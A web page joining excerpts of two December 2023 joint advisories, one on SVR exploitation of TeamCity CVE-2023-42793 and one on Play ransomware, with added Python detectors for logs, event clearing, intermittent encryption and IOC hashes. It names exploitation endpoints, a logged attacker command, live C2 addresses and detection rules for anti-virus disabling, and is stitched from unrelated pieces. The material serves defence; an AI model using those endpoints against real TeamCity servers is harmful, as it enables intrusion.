The FBI, CISA, NSA, SKW, CERT Polska, and NCSC assess the scope and indiscriminate targeting of this campaign poses a threat to public safety and recommend organizations implement the mitigations below to improve their cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Apply available patches for CVE-2023-42793 issued by JetBrains TeamCity in mid-September 2023, if not already completed.
Monitor the network for evidence of encoded commands and execution of network scanning tools.
Ensure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
Require use of multi-factor authentication [CPG 1.3] for all services to the extent possible, particularly for email, virtual private networks, and accounts that access critical systems.
Organizations should adopt multi-factor authentication (MFA) as an additional layer of security for all users with access to sensitive data. Enabling MFA significantly reduces the risk of unauthorized access, even if passwords are compromised.
Keep all operating systems, software, and firmware up to date. Immediately configure newly added systems on the network, including those used for testing or development work, to follow the organization’s security baseline, and incorporate them into enterprise monitoring tools.
Audit log files to identify attempts to access privileged certificates and creation of fake identity providers.
Deploy software to identify suspicious behavior on systems.
Deploy endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
Use available public resources to identify credential abuse with cloud environments.
Configure authentication mechanisms to confirm certain user activities on systems, including registering new devices.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see previous tables).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
REFERENCES
FBI, DHS, CISA, Joint Cyber Security Advisory, Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders
NSA, CISA, FBI, Joint Cyber Security Advisory, Russian SVR Targets U.S. and Allied Networks
CISA, Remediating Networks Affected by the Solarwinds and Active Directory/M365 Compromise
CISA, Alert (AA21-008A), Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
CISA, Alert (AA20-352A), Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
CISA, CISA Insights, What Every Leader Needs to Know About the Ongoing APT Cyber Activity
FBI, CISA, Joint Cybersecurity Advisory, Advanced Persistent Threat Actors Targeting U.S. Think Tanks
CISA, Malicious Activity Targeting COVID-19 Research, Vaccine Development
NCSC, CSE, NSA, CISA, Advisory: APT 29 Targets COVID-19 Vaccine Development
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, SKW, CERT Polska, and NCSC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, NSA, SKW, CERT Polska, and NCSC.
VERSION HISTORY
December 12, 2023: Initial version.
APPENDIX A – INDICATORS OF COMPROMISE CVE-2023-42793
On a Windows system, the log file C:\TeamCity\logs\teamcity-server.log will contain a log message when an attacker modifies the internal.properties file. There will also be a log message for every process created via the /app/rest/debug/processes endpoint. In addition to showing the command line used, the user ID of the user account whose authentication token was used during the attack is also shown. For example:
[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"
An attacker may attempt to cover their tracks by wiping this log file. It does not appear that TeamCity logs individual HTTP requests, but if TeamCity is configured to sit behind an HTTP proxy, the HTTP proxy may have suitable logs showing the following target endpoints being accessed:
/app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the vulnerability.
/app/rest/users – This endpoint is only required if the attacker wishes to create an arbitrary user.
/app/rest/debug/processes – This endpoint is only required if the attacker wishes to create an arbitrary process.
Note: The user ID value may be higher than 1.
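The two log sources in this appendix can be triaged with a short script. The following is an added example for this page (not CISA's or JetBrains' code) that extracts the internal.properties edit and process-launch messages from teamcity-server.log and flags proxy requests to the three endpoints listed above; the log lines are constructed from the excerpts above, the proxy log is assumed to be in the common access-log format, and treating only a POST to /app/rest/users as user creation is an assumption.

```python
"""Hunt for CVE-2023-42793 exploitation traces in the two log sources named in
Appendix A: teamcity-server.log and the access log of a proxy in front of
TeamCity. Added example for this page, not CISA's or JetBrains' code. The log
lines are constructed (modelled on the Appendix A excerpts); the proxy log is
assumed to be in the common/combined access-log format."""
import re

SAMPLE_TEAMCITY_LOG = r"""
[2023-09-26 11:53:46,970]   INFO -  ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:58,227]   INFO -  tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"
[2023-09-26 12:01:03,110]   INFO -  jetbrains.buildServer.SERVER - Build agent "agent-1" registered
""".strip()

# Constructed proxy access log; 203.0.113.7 and 10.0.0.12 are documentation addresses.
SAMPLE_PROXY_LOG = """
203.0.113.7 - - [26/Sep/2023:11:53:40 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 412
203.0.113.7 - - [26/Sep/2023:11:53:58 +0000] "POST /app/rest/debug/processes HTTP/1.1" 200 88
10.0.0.12 - - [26/Sep/2023:12:00:01 +0000] "GET /app/rest/users HTTP/1.1" 200 2048
10.0.0.12 - - [26/Sep/2023:12:02:11 +0000] "GET /app/rest/builds HTTP/1.1" 200 9001
""".strip()

TIMESTAMP = re.compile(r"^\[(?P<ts>[^\]]+)\]")
FILE_EDIT = re.compile(r"File edited: (?P<path>\S+) by user with id=(?P<uid>\d+)")
PROC_LAUNCH = re.compile(
    r"External process is launched by user .*?with id=(?P<uid>\d+)\. Command line: (?P<cmd>.*)$")
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<path>[^\s?"]+)')
# The user ID may be higher than 1 (see the note above), so any id is accepted.
TOKEN_ENDPOINT = re.compile(r"^/app/rest/users/id:\d+/tokens/RPC2$")


def parse_teamcity_log(text):
    """Return findings for internal.properties edits and debug-endpoint process launches."""
    findings = []
    for line in text.splitlines():
        ts = TIMESTAMP.match(line)
        stamp = ts.group("ts") if ts else ""
        edit = FILE_EDIT.search(line)
        if edit and edit.group("path").lower().endswith("internal.properties"):
            findings.append({"time": stamp, "kind": "internal.properties modified",
                             "user_id": int(edit.group("uid")), "detail": edit.group("path")})
            continue
        launch = PROC_LAUNCH.search(line)
        if launch:
            findings.append({"time": stamp, "kind": "external process launched",
                             "user_id": int(launch.group("uid")), "detail": launch.group("cmd")})
    return findings


def classify_request(method, path):
    """Map a proxied TeamCity request to the Appendix A endpoint it touches, or None."""
    if TOKEN_ENDPOINT.match(path):
        return "authentication token created (required for exploitation)"
    if path == "/app/rest/debug/processes":
        return "arbitrary process creation"
    # Assumption: only a POST creates a user; GET /app/rest/users is a routine listing.
    if path == "/app/rest/users" and method == "POST":
        return "arbitrary user creation"
    return None


def suspicious_proxy_requests(text):
    """Return one record per request line that hits one of the listed endpoints."""
    hits = []
    for line in text.splitlines():
        req = REQUEST.search(line)
        if not req:
            continue
        kind = classify_request(req.group("method"), req.group("path"))
        if kind:
            hits.append({"client": line.split(" ", 1)[0], "method": req.group("method"),
                         "path": req.group("path"), "kind": kind})
    return hits


if __name__ == "__main__":
    for finding in parse_teamcity_log(SAMPLE_TEAMCITY_LOG):
        print(finding)
    for hit in suspicious_proxy_requests(SAMPLE_PROXY_LOG):
        print(hit)
```

Correlating the client address of the RPC2 request with the user ID in the TeamCity log gives the token that was minted and the commands it was then used to run.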
APPENDIX B – IOCS
File IoCs
GraphicalProton backdoor:
GraphicalProton HTTPS backdoor:
Backdoored vcperf:
D724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443
Backdoored Zabbix installation archive:
4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F
Backdoored Webroot AV installation archive:
950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4
Modified Rsockstun:
CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
Network IoCs
Tunnel Endpoints
65.20.97[.]203
65.21.51[.]58
Exploitation Server
103.76.128[.]34
GraphicalProton HTTPS C2 URL:
hxxps://matclick[.]com/wp-query[.]php
December 12, 2023
A vulnerability has been identified in various devices running different operating systems, including Android, Linux, iOS and macOS, while the Bluetooth functionality is enabled.
December 12, 2023
Apple has released iOS 16.7.3, iOS 17.2, iPadOS 16.7.3 and iPadOS 17.2 to fix the vulnerabilities in various Apple devices.
December 12, 2023
SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) are releasing this joint CSA to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as October 2023.
Since June 2022, the Play (also known as Playcrypt) ransomware group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe. As of October 2023, the FBI was aware of approximately 300 affected entities allegedly exploited by the ransomware actors.
In Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.
The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.
The FBI, CISA, and ASD’s ACSC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. This includes requiring multifactor authentication, maintaining offline backups of data, implementing a recovery plan, and keeping all operating systems, software, and firmware up to date.
Download a PDF version of this report:
AA23-352A #StopRansomware: Play Ransomware (PDF, 536.19 KB)
For a downloadable copy of IOCs, see:
AA23-352A STIX XML (XML, 34.87 KB)
AA23-352A STIX JSON (JSON, 30.22 KB)
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK for Enterprise section for all referenced tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Initial Access
The Play ransomware group gains initial access to victim networks through the abuse of valid accounts [T1078] and exploitation of public-facing applications [T1190], specifically through known FortiOS (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell [CVE-2022-41040 and CVE-2022-41082]) vulnerabilities. Play ransomware actors have been observed to use external-facing services [T1133] such as Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access.
Discovery and Defense Evasion
Play ransomware actors use tools like AdFind to run Active Directory queries [TA0007] and Grixba [1], an information-stealer, to enumerate network information [T1016] and scan for anti-virus software [T1518.001]. Actors also use tools like GMER, IOBit, and PowerTool to disable anti-virus software [T1562.001] and remove log files [T1070.001]. In some instances, cybersecurity researchers have observed Play ransomware actors using PowerShell scripts to target Microsoft Defender [2].
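The log-clearing [T1070.001] and anti-virus-disabling [T1562.001] behaviour above leaves traces in the Windows event logs themselves. The following is an added detection example for this advisory, not tooling from the advisory or its authors. It runs over constructed JSON-lines records shaped like an exported event log; the field names (TimeCreated, Channel, EventID, Computer, SubjectUserName) are an assumption of the example, while the Event IDs it keys on (Security 1102, System 104, Defender/Operational 5001) are real Windows identifiers.

```python
"""Detect Windows event-log clearing and Defender real-time protection being
turned off in exported event records.

Added example for this advisory's Defense Evasion section; it is not tooling
from the advisory or its authors. Records are constructed JSON lines whose
field names (TimeCreated, Channel, EventID, Computer, SubjectUserName) are an
assumption of this example; the Event IDs themselves are real Windows ones.
"""
import json
from typing import Dict, Iterable, Iterator, List, Tuple

# (Channel, EventID) -> the ATT&CK technique this advisory maps it to.
RULES: Dict[Tuple[str, int], str] = {
    ("Security", 1102): "T1070.001: Security audit log cleared",
    ("System", 104): "T1070.001: event log file cleared",
    ("Microsoft-Windows-Windows Defender/Operational", 5001):
        "T1562.001: Defender real-time protection disabled",
}

# Constructed sample export: one benign logon, three suspicious events, one
# malformed line and one 1102 in a channel where the rule does not apply.
SAMPLE_LOG = """\
{"TimeCreated": "2023-10-02T03:14:07Z", "Channel": "Security", "EventID": 4624, "Computer": "WS01.example.local", "SubjectUserName": "jdoe"}
{"TimeCreated": "2023-10-02T03:21:55Z", "Channel": "Security", "EventID": 1102, "Computer": "DC01.example.local", "SubjectUserName": "svc-backup"}
{"TimeCreated": "2023-10-02T03:22:01Z", "Channel": "System", "EventID": 104, "Computer": "DC01.example.local", "SubjectUserName": "svc-backup"}
{"TimeCreated": "2023-10-02T03:22:40Z", "Channel": "Microsoft-Windows-Windows Defender/Operational", "EventID": 5001, "Computer": "WS01.example.local", "SubjectUserName": "SYSTEM"}
this line is not JSON and must not abort the scan
{"TimeCreated": "2023-10-02T03:25:12Z", "Channel": "Application", "EventID": 1102, "Computer": "WS02.example.local", "SubjectUserName": "jdoe"}
"""


def parse_records(lines: Iterable[str]) -> Iterator[Dict]:
    """Yield one dict per well-formed JSON line; malformed lines are skipped."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(rec, dict):
            yield rec


def detect(records: Iterable[Dict]) -> List[Dict[str, str]]:
    """Return one finding per record whose (Channel, EventID) matches a rule."""
    findings = []
    for rec in records:
        try:
            key = (str(rec.get("Channel", "")), int(rec.get("EventID")))
        except (TypeError, ValueError):
            continue  # missing or non-numeric EventID
        rule = RULES.get(key)
        if rule is None:
            continue
        findings.append({
            "time": str(rec.get("TimeCreated", "")),
            "computer": str(rec.get("Computer", "")),
            "user": str(rec.get("SubjectUserName", "")),
            "event_id": str(key[1]),
            "rule": rule,
        })
    return findings


def scan_text(text: str) -> List[Dict[str, str]]:
    """Convenience wrapper: parse and detect over a JSON-lines export."""
    return detect(parse_records(text.splitlines()))


if __name__ == "__main__":
    for f in scan_text(SAMPLE_LOG):
        print(f"{f['time']} {f['computer']} {f['user']}: {f['rule']}")
```

Because the clearing event is written to the log that was just cleared, it only survives if logs are forwarded off the host; run this kind of check against a collector rather than against the endpoint's local log.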
Lateral Movement and Execution
Play ransomware actors use command and control (C2) applications, including Cobalt Strike and SystemBC, and tools like PsExec, to assist with lateral movement and file execution. Once established on a network, the ransomware actors search for unsecured credentials [T1552] and use the Mimikatz credential dumper to gain domain administrator access [T1003]. According to open source reporting [2], to further enumerate vulnerabilities, Play ransomware actors use Windows Privilege Escalation Awesome Scripts (WinPEAS) [T1059] to search for additional privilege escalation paths. Actors then distribute executables [T1570] via Group Policy Objects [T1484.001].
Exfiltration and Encryption
Play ransomware actors often split compromised data into segments and use tools like WinRAR to compress files [T1560.001] into .RAR format for exfiltration. The actors then use WinSCP to transfer data [T1048] from a compromised network to actor-controlled accounts. Following exfiltration, files are encrypted [T1486] with AES-RSA hybrid encryption using intermittent encryption, encrypting every other file portion of 0x100000 bytes [3]. (Note: System files are skipped during the encryption process.) A .play extension is added to file names and a ransom note titled ReadMe[.]txt is placed in the C: directory.
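Intermittent encryption of alternating 0x100000-byte portions produces a file whose entropy rises and falls block by block, which is both a way to spot affected files and a way to know which byte ranges can still be recovered. The following is an added example for this section, not code from the advisory or from the cited research. It assumes the 0x100000-byte portion size the advisory cites; the entropy thresholds and the encrypted_first parameter are the example's own assumptions, since the advisory does not say which portion is encrypted first.

```python
"""Per-block entropy profiling to flag files touched by intermittent
(every-other-portion) encryption, and the byte ranges such a scheme leaves in
the clear.

Added example for the Exfiltration and Encryption section; it is not code from
the advisory or from the cited research. It assumes the 0x100000-byte portion
size the advisory cites; the entropy thresholds and the encrypted_first
parameter are this example's own assumptions.
"""
import math
import os
from collections import Counter
from typing import List, Tuple

BLOCK_SIZE = 0x100000   # 1 MiB portion size cited in the advisory
HIGH_ENTROPY = 7.5      # assumption: AES output measures close to 8.0 bits/byte
LOW_ENTROPY = 6.5       # assumption: ordinary documents/executables sit below this


def shannon_entropy(block: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for an empty block)."""
    if not block:
        return 0.0
    n = len(block)
    return -sum((c / n) * math.log2(c / n) for c in Counter(block).values())


def entropy_profile(data: bytes, block_size: int = BLOCK_SIZE) -> List[float]:
    """Entropy of each consecutive block_size-byte portion of data."""
    return [shannon_entropy(data[i:i + block_size])
            for i in range(0, len(data), block_size)]


def looks_intermittently_encrypted(profile: List[float]) -> bool:
    """True when adjacent blocks strictly alternate between high and low entropy.

    A fully encrypted file (all high) or an untouched file (all low) returns
    False, as does any file with an ambiguous block between the thresholds.
    """
    if len(profile) < 2:
        return False
    labels = []
    for e in profile:
        if e >= HIGH_ENTROPY:
            labels.append("H")
        elif e <= LOW_ENTROPY:
            labels.append("L")
        else:
            return False
    return all(a != b for a, b in zip(labels, labels[1:]))


def plaintext_ranges(size: int, block_size: int = BLOCK_SIZE,
                     encrypted_first: bool = True) -> List[Tuple[int, int]]:
    """[start, end) byte ranges expected to remain unencrypted under an
    every-other-portion scheme; useful when triaging what can still be carved
    from an affected file. Which portion comes first is an assumption."""
    ranges = []
    for idx, start in enumerate(range(0, size, block_size)):
        encrypted = (idx % 2 == 0) == encrypted_first
        if not encrypted:
            ranges.append((start, min(start + block_size, size)))
    return ranges


def constructed_sample(block_size: int = BLOCK_SIZE) -> bytes:
    """Constructed input: random (cipher-like) and text-like blocks alternated."""
    text = b"The quick brown fox jumps over the lazy dog. "
    structured = (text * (block_size // len(text) + 1))[:block_size]
    return os.urandom(block_size) + structured + os.urandom(block_size) + structured


if __name__ == "__main__":
    profile = entropy_profile(constructed_sample())
    print("per-block entropy:", [round(e, 2) for e in profile])
    print("intermittent pattern:", looks_intermittently_encrypted(profile))
    print("clear ranges of a 2.5 MiB file:", plaintext_ranges(5 * BLOCK_SIZE // 2))
```

Already-compressed or encrypted formats (archives, media, encrypted containers) read as uniformly high entropy and will not show the alternating pattern, so this check complements, rather than replaces, the .play extension and ransom-note indicators.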
Impact
The Play ransomware group uses a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note directs victims to contact the Play ransomware group at an email address ending in @gmx[.]de. Ransom payments are paid in cryptocurrency to wallet addresses provided by Play actors. If a victim refuses to pay the ransom demand, the ransomware actors threaten to publish exfiltrated data to their leak site on the Tor network ([.]onion URL).
Leveraged Tools
Table 1 lists legitimate tools Play ransomware actors have repurposed for their operations. The legitimate tools listed in this product are all publicly available. Use of these tools and applications should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.
Table 1: Tools Leveraged by Play Ransomware Actors
Name | Description
AdFind | Used to query and retrieve information from Active Directory.
Bloodhound | Used to query and retrieve information from Active Directory.
GMER | A software tool intended to be used for detecting and removing rootkits.
IOBit | An anti-malware and anti-virus program for the Microsoft Windows operating system. Play actors have accessed IOBit to disable anti-virus software.
PsExec | A tool designed to run programs and execute commands on remote systems.
PowerTool | A Windows utility designed to improve speed, remove bloatware, protect privacy, and eliminate data collection, among other things.
PowerShell | A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
Cobalt Strike | A penetration testing tool used by security professionals to test the security of networks and systems. Play ransomware actors have used it to assist with lateral movement and file execution.
Mimikatz | Allows users to view and save authentication credentials such as Kerberos tickets. Play ransomware actors have used it to add accounts to domain controllers.
WinPEAS | Used to search for additional privilege escalation paths.
WinRAR | Used to split compromised data into segments and to compress files into .RAR format for exfiltration.
WinSCP | Windows Secure Copy is a free and open-source Secure Shell (SSH) File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Play ransomware actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts.
Microsoft Nltest | Used by Play ransomware actors for network discovery.
Nekto / PriviCMD | Used by Play ransomware actors for privilege escalation.
Process Hacker | Used to enumerate running processes on a system.
Plink | Used to establish persistent SSH tunnels.
Indicators of Compromise
See Table 2 for Play ransomware IOCs obtained from FBI investigations as of October 2023.
Table 2: Hashes Associated with Play Ransomware Actors
Hash (SHA256) | Description
453257c3494addafb39cb6815862403e827947a1e7737eb8168cd10522465deb | Play ransomware custom data gathering tool
47c7cee3d76106279c4c28ad1de3c833c1ba0a2ec56b0150586c7e8480ccae57 | Play ransomware encryptor
75404543de25513b376f097ceb383e8efb9c9b95da8945fd4aa37c7b2f226212 | SystemBC malware EXE
7a42f96599df8090cf89d6e3ce4316d24c6c00e499c8557a2e09d61c00c11986 | SystemBC malware DLL
7a6df63d883bbccb315986c2cfb76570335abf84fafbefce047d126b32234af8 | Play ransomware binary
7dea671be77a2ca5772b86cf8831b02bff0567bce6a3ae023825aa40354f8aca | SystemBC malware DLL
c59f3c8d61d940b56436c14bc148c1fe98862921b8f7bad97fbc96b31d71193c | Play network scanner
e652051fe47d784f6f85dc00adca1c15a8c7a40f1e5772e6a95281d8bf3d5c74 | Play ransomware binary
e8d5ad0bf292c42a9185bb1251c7e763d16614c180071b01da742972999b95da | Play ransomware binary
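A practical way to use Table 2 during threat hunting is to hash every file under a suspect path and compare against the list. The following is an added example for the Indicators of Compromise section, not a tool from the advisory or its authors. The hash values are copied from Table 2; the directory walk, chunked hashing and reporting are the example's own.

```python
"""Match files on disk against the SHA256 indicators in Table 2.

Added example for the Indicators of Compromise section; it is not a tool
from the advisory or its authors. The hash values are copied from Table 2;
the directory walk, chunked hashing and reporting are this example's own.
"""
import hashlib
import os
import sys
from typing import Dict, Iterable, Iterator, List, Tuple

# SHA256 -> description, from Table 2 of this advisory.
PLAY_IOCS: Dict[str, str] = {
    "453257c3494addafb39cb6815862403e827947a1e7737eb8168cd10522465deb": "Play ransomware custom data gathering tool",
    "47c7cee3d76106279c4c28ad1de3c833c1ba0a2ec56b0150586c7e8480ccae57": "Play ransomware encryptor",
    "75404543de25513b376f097ceb383e8efb9c9b95da8945fd4aa37c7b2f226212": "SystemBC malware EXE",
    "7a42f96599df8090cf89d6e3ce4316d24c6c00e499c8557a2e09d61c00c11986": "SystemBC malware DLL",
    "7a6df63d883bbccb315986c2cfb76570335abf84fafbefce047d126b32234af8": "Play ransomware binary",
    "7dea671be77a2ca5772b86cf8831b02bff0567bce6a3ae023825aa40354f8aca": "SystemBC malware DLL",
    "c59f3c8d61d940b56436c14bc148c1fe98862921b8f7bad97fbc96b31d71193c": "Play network scanner",
    "e652051fe47d784f6f85dc00adca1c15a8c7a40f1e5772e6a95281d8bf3d5c74": "Play ransomware binary",
    "e8d5ad0bf292c42a9185bb1251c7e763d16614c180071b01da742972999b95da": "Play ransomware binary",
}


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hex SHA256 of a file, read in chunks so large files never load whole into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def iter_files(root: str) -> Iterator[str]:
    """Walk root recursively, yielding regular file paths (symlinks are not followed)."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path) and not os.path.islink(path):
                yield path


def find_ioc_matches(paths: Iterable[str],
                     iocs: Dict[str, str] = PLAY_IOCS) -> List[Tuple[str, str, str]]:
    """Return (path, sha256, description) for every file whose hash is in iocs.

    Files that cannot be read (locked, permissions, vanished) are skipped
    rather than aborting the scan, so one protected file does not hide the rest.
    """
    wanted = {k.lower(): v for k, v in iocs.items()}
    matches = []
    for path in paths:
        try:
            digest = sha256_file(path)
        except OSError:
            continue
        desc = wanted.get(digest)
        if desc is not None:
            matches.append((path, digest, desc))
    return matches


def scan_tree(root: str, iocs: Dict[str, str] = PLAY_IOCS) -> List[Tuple[str, str, str]]:
    """Hash every file under root and report those matching the IOC list."""
    return find_ioc_matches(iter_files(root), iocs)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    hits = scan_tree(target)
    for path, digest, desc in hits:
        print(f"MATCH {digest}  {desc}: {path}")
    print(f"{len(hits)} matching file(s) under {target}")
```

Hash matching only catches the exact samples the FBI observed; a recompiled or repacked binary will not match, so treat a clean result as one signal among the TTP-based checks in this advisory rather than as proof of absence. Run it from a known-good system against mounted images or forwarded copies where possible, not from a host suspected of being compromised.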
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 3–Table 11 for all referenced threat actor tactics and techniques in this advisory.
Table 3: Play ATT&CK Techniques for Enterprise for Initial Access
Technique Title | ID | Use
Valid Accounts | T1078 | Play ransomware actors obtain and abuse existing account credentials to gain initial access.
Exploit Public Facing Application | T1190 | Play ransomware actors exploit vulnerabilities in internet-facing systems to gain access to networks.
External Remote Services | T1133 | Play ransomware actors have used remote access services, such as RDP/VPN connections, to gain initial access.
Table 4: Play ATT&CK Techniques for Enterprise for Discovery
Technique Title | ID | Use
System Network Configuration Discovery | T1016 | Play ransomware actors use tools like Grixba to identify network configurations and settings.
Software Discovery: Security Software Discovery | T1518.001 | Play ransomware actors scan for anti-virus software.
Table 5: Play ATT&CK Techniques for Enterprise for Defense Evasion
Technique Title | ID | Use
Impair Defenses: Disable or Modify Tools | T1562.001 | Play ransomware actors use tools like GMER, IOBit, and PowerTool to disable anti-virus software.
Indicator Removal: Clear Windows Event Logs | T1070.001 | Play ransomware actors delete logs or other indicators of compromise to hide intrusion activity.
Table 6: Play ATT&CK Techniques for Enterprise for Credential Access
Technique Title | ID | Use
Unsecured Credentials | T1552 | Play ransomware actors attempt to identify and exploit credentials stored insecurely on a compromised network.
OS Credential Dumping | T1003 | Play ransomware actors use tools like Mimikatz to dump credentials.
Table 7: Play ATT&CK Techniques for Enterprise for Lateral Movement
Technique Title | ID | Use
Lateral Tool Transfer | T1570 | Play ransomware actors distribute executables within the compromised environment.
Table 8: Play ATT&CK Techniques for Enterprise for Command and Control
Technique Title | ID | Use
Domain Policy Modification: Group Policy Modification | T1484.001 | Play ransomware actors distribute executables via Group Policy Objects.
Table 9: Play ATT&CK Techniques for Enterprise for Collection
Technique Title | ID | Use
Archive Collected Data: Archive via Utility | T1560.001 | Play ransomware actors use tools like WinRAR to compress files.
Table 10: Play ATT&CK Techniques for Enterprise for Exfiltration
Technique Title | ID | Use
Exfiltration Over Alternative Protocol | T1048 | Play ransomware actors use file transfer tools like WinSCP to transfer data.
Table 11: Play ATT&CK Techniques for Enterprise for Impact
Technique Title | ID | Use
Data Encrypted for Impact | T1486 | Play ransomware actors encrypt data on target systems to interrupt availability to system and network resources.
Financial Theft | T1657 | Play ransomware actors use a double-extortion model for financial gain.
MITIGATIONS
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and ASD’s ACSC recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus strengthening the security posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI, CISA, and ASD’s ACSC recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Play ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 2.F, 2.R, 2.S] in a physically separate, segmented, and secure location (e.g., a hard drive, a storage device, or the cloud).
Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies [CPG 2.C].
Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 2.B];
Store passwords in hashed format using industry-recognized password managers;
Add password user “salts” to shared login credentials;
Avoid reusing passwords;
Implement multiple failed login attempt account lockouts [CPG 2.G];
Disable password “hints”;
Refrain from requiring password changes more frequently than once per year.
Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
Require administrator credentials to install software.
Require multifactor authentication [CPG 2.H] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems. Also see Protect Yourself: Multi-Factor Authentication | Cyber.gov.au.
